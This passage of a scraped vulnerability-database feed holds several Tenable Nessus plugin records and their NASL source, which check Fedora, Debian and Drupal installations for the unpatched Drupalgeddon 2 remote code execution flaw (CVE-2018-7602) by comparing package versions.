(Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-43C64DEADA.NASL", "href": "https://www.tenable.com/plugins/nessus/120383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security 
Advisory FEDORA-2018-43c64deada.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120383);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"FEDORA\", value:\"2018-43c64deada\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 28 : drupal7 (2018-43c64deada) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43c64deada\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal7-7.59-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:35", "description": "A remote code execution vulnerability has been found in Drupal, a fully-featured content management framework. For additional information, please refer to the upstream advisory at https://www.drupal.org/sa-core-2018-004", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T00:00:00", "type": "nessus", "title": "Debian DSA-4180-1 : drupal7 - security update (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-26T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4180.NASL", "href": "https://www.tenable.com/plugins/nessus/109349", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4180. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109349);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"DSA\", value:\"4180\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Debian DSA-4180-1 : drupal7 - security update (Drupalgeddon 2)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. 
For additional\ninformation, please refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-004\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=896701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.drupal.org/sa-core-2018-004\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4180\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the drupal7 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7602\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u12\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:29", "description": "- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update 
system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T00:00:00", "type": "nessus", "title": "Fedora 26 : drupal7 (2018-2359c2ae0e) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-2359C2AE0E.NASL", "href": "https://www.tenable.com/plugins/nessus/109706", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-2359c2ae0e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109706);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 26 : drupal7 (2018-2359c2ae0e) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-2359c2ae0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal7 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal7-7.59-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:40", "description": "- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T00:00:00", "type": "nessus", "title": "Fedora 27 : drupal7 (2018-b9ad458866) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal7", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-B9AD458866.NASL", "href": "https://www.tenable.com/plugins/nessus/109710", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-b9ad458866.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109710);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"FEDORA\", value:\"2018-b9ad458866\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 27 : drupal7 (2018-b9ad458866) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/7.59\n\n - https://www.drupal.org/SA-CORE-2018-004\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-b9ad458866\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal7 package.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"drupal7-7.59-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal7\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:16", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.59, 8.4.x prior to 8.4.8, or 8.5.x prior to 8.5.3. 
It is, therefore, affected by a remote code execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.59 / 8.4.x < 8.4.8 / 8.5.x < 8.5.3 Remote Code Execution Vulnerability (SA-CORE-2018-004)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2022-04-22T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_8_5_3.NASL", "href": "https://www.tenable.com/plugins/nessus/109344", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109344);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Drupal 7.x < 7.59 / 8.4.x < 8.4.8 / 8.5.x < 8.5.3 Remote 
Code Execution Vulnerability (SA-CORE-2018-004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running\non the remote web server is 7.x prior to 7.59, 8.4.x prior to 8.4.8,\nor 8.5.x prior to 8.5.3. It is, therefore, affected by a remote code\nexecution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.59\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.4.8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.5.3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.59 / 8.4.8 / 8.5.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7602\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/25\");\n 
